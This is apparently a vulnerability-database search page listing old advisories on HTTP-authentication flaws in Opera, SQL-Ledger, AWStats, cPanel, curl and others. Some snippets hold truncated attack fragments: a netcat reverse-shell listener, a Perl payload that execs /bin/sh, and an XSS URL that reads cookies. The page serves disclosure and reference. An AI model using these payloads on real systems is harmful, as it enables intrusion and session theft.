Lucene search

425 matches found

Opera Security Advisories
added 2007/07/19 12:0 a.m., 9 views

Opera's HTTP authentication cuts off long server names at the end

Opera's HTTP authentication dialog is displayed when the user enters a Web page that requires a login name and a password. To inform the user which server it was that asked for login credentials, the dialog displays the server name. The user has to see the entire server name. A truncated name can be...

0.6 AI score
Exploits: 0, Affected Software: 1

FreeBSD
added 2007/07/19 12:0 a.m., 36 views

opera -- multiple vulnerabilities

Opera Software ASA reports of multiple security fixes in Opera, including an arbitrary code execute vulnerability: Opera for Linux, FreeBSD, and Solaris has a flaw in the createPattern function that leaves old data that was in the memory before Opera allocated it in the new pattern. The pattern c...

6.9 AI score
Exploits: 0, References: 6

securityvulns
added 2007/04/20 12:0 a.m., 34 views

Novell Groupwise WebAccess buffer overflow

Stack buffer overflow stack overrun during TCP/7205 TCP/7211 HTTP basic authentication on base64 decoding...

10 CVSS, 2.3 AI score, 0.36221 EPSS
Exploits: 5, References: 1

Tenable Nessus
added 2007/03/18 12:0 a.m., 13 views

FreeBSD : sql-ledger -- security bypass vulnerability (8e02441d-d39c-11db-a6da-0003476f14d3)

Chris Travers reports : George Theall of Tenable Security notified the LedgerSMB core team today of an authentication bypass vulnerability allowing full access to the administrator interface of LedgerSMB 1.1 and SQL-Ledger 2.x. The problem is caused by the password checking routine failing to...

5.7 AI score
Exploits: 0, References: 3

securityvulns
added 2007/03/10 12:0 a.m., 45 views

Security bypass vulnerability in LedgerSMB and SQL-Ledger (fixes released today)

Hi all; George Theall of Tenable Security notified the LedgerSMB core team today of an authentication bypass vulnerability allowing full access to the administrator interface of LedgerSMB 1.1 and SQL-Ledger 2.x. The problem is caused by the password checking routine failing to enforce a password...

7.7 AI score
Exploits: 0

FreeBSD
added 2007/03/09 12:0 a.m., 18 views

sql-ledger -- security bypass vulnerability

Chris Travers reports: George Theall of Tenable Security notified the LedgerSMB core team today of an authentication bypass vulnerability allowing full access to the administrator interface of LedgerSMB 1.1 and SQL-Ledger 2.x. The problem is caused by the password checking routine failing to...

7.8 AI score
Exploits: 0, References: 1

Tenable Nessus
added 2006/08/29 12:0 a.m., 38 views

Fuji Xerox Printing Systems (FXPS) Print Engine Crafted Request HTTP Authentication Bypass

The remote host appears to be a Fuji Xerox Printing Systems FXPS printer. According to its firmware version, the web server component of the FXPS device reportedly fails to authenticate HTTP requests, which could allow a remote attacker to gain administrative control of the affected printer and...

6.4 CVSS, 5.5 AI score, 0.02534 EPSS
Exploits: 0, References: 3

myhack58
added 2006/06/18 12:0 a.m., 12 views

Executing external system commands in PHP - vulnerability warning - the black bar safety net

PHP, as a server-side scripting language, is fully able to handle tasks ranging from a simple to a complex dynamic web page. But that is not always the case: sometimes, in order to achieve a certain function, it must rely on an external program of the operating system, or...

Exploits: 0

Packet Storm
added 2006/05/06 12:0 a.m., 42 views

bl4ck_awstats_migrate_cmd_inj.py.txt

!/usr/bin/env python http://secunia.com/advisories/19969/ by [email protected] May 5, 2006 - HAPPY CINCO DE MAYO HAPPY BIRTHDAY DAD private plz redsand@jinxy / $ nc -l -p 31337 -v listening on any 31337 ... connect to 65.99.197.147 from blacksecurity.org 65.99.197.147 53377 id uid=81apach...

7.4 AI score
Exploits: 0

0day.today
added 2006/05/06 12:0 a.m., 86 views

AWStats <= 6.5 (migrate) Remote Shell Command Injection Exploit

Exploit for cgi platform in category web applications =============================================================== AWStats &CLIENT";openSTDOUT,"&CLIENT";openSTDERR,"&CLIENT";ifforkexec "/bin/sh"; exit0; ;''; class rbawstatsMigrate: url = '' user = '' password = '' auth = False chost =False...

7.1 AI score
Exploits: 0

securityvulns
added 2006/02/08 12:0 a.m., 40 views

[Full-disclosure] Re: cPanel Multiple Cross Site Scripting Vulnerability

One more to ur list http://localhost:2095/dowebmailforward.cgi?fwd=3Cscript3Ealert28document.cookie293B3C2Fscript3E&action=Add+Forwarder Sumit On 2/4/06, Hamish Stanaway [email protected] wrote: Hi there, Thank you for finding this vulnerability in a widely used software. I was wondering i...

Exploits: 0

OSV
added 2005/10/13 10:2 p.m., 1 views

DEBIAN-CVE-2005-3185

Stack-based buffer overflow in the ntlm_output function in http-ntlm.c for (1) wget 1.10, (2) curl 7.13.2, and (3) libcurl 7.13.2, and other products that use libcurl, when NTLM authentication is enabled, allows remote servers to execute arbitrary code via a long NTLM username...

7.5 CVSS, 8.1 AI score, 0.04852 EPSS
Exploits: 0, References: 1

Debian
added 2005/10/05 9:23 a.m., 18 views

[SECURITY] [DSA 844-1] New mod-auth-shadow packages fix authentication bypass

-------------------------------------------------------------------------- Debian Security Advisory DSA 844-1 [email protected] http://www.debian.org/security/ Martin Schulze October 5th, 2005 http://www.debian.org/security/faq -...

7.5 CVSS, 0.4 AI score, 0.01486 EPSS
Exploits: 0

OSV
added 2005/10/05 12:0 a.m., 16 views

DSA-844-1 mod-auth-shadow - programming error

Bulletin has no description...

7.5 CVSS, 6.7 AI score, 0.01486 EPSS
Exploits: 0

Tenable Nessus
added 2005/10/05 12:0 a.m., 20 views

Debian DSA-844-1 : mod-auth-shadow - programming error

A vulnerability in mod_auth_shadow, an Apache module that lets users perform HTTP authentication against /etc/shadow, has been discovered. The module runs for all locations that use the 'require group' directive which would bypass access restrictions controlled by another authorisation mechanism,...

7.5 CVSS, 5.4 AI score, 0.01486 EPSS
Exploits: 0, References: 3

Tenable Nessus
added 2005/06/17 12:0 a.m., 12 views

HTTP Plaintext Password Authentication

Binary data 3018.prm...

7.3 AI score
Exploits: 0

CVE
added 2005/06/09 4:0 a.m., 63 views

CVE-2005-1935

CVE-2005-1935 documents a heap-based buffer overflow in the BERDecBitString function of Microsoft's ASN.1 library (MSASN1.DLL). The overflow occurs when processing nested constructed bit strings, leading to a realloc of a non-null pointer and potential overwrite of freed memory, demonstrated via ...

7.5 CVSS, 7.9 AI score, 0.34297 EPSS
Exploits: 6, References: 2, Affected Software: 4

Cvelist
added 2005/06/09 4:0 a.m., 29 views

CVE-2005-1935

Heap-based buffer overflow in the BERDecBitString function in Microsoft ASN.1 library MSASN1.DLL allows remote attackers to execute arbitrary code via nested constructed bit strings, which leads to a realloc of a non-null pointer and causes the function to overwrite previously freed memory, as...

7.7 AI score, 0.34297 EPSS
Exploits: 6, References: 2

UbuntuCve
added 2005/05/02 4:0 a.m., 25 views

CVE-2005-0584

Firefox before 1.0.1 and Mozilla before 1.7.6, when displaying the HTTP Authentication dialog, do not change the focus to the tab that generated the prompt, which could facilitate spoofing and phishing attacks...

2.6 CVSS, 5.9 AI score, 0.00575 EPSS
Exploits: 0, References: 2

NVD
added 2005/05/02 4:0 a.m., 15 views

CVE-2005-0584

Firefox before 1.0.1 and Mozilla before 1.7.6, when displaying the HTTP Authentication dialog, do not change the focus to the tab that generated the prompt, which could facilitate spoofing and phishing attacks...

2.6 CVSS, 6.3 AI score, 0.00575 EPSS
Exploits: 0, References: 8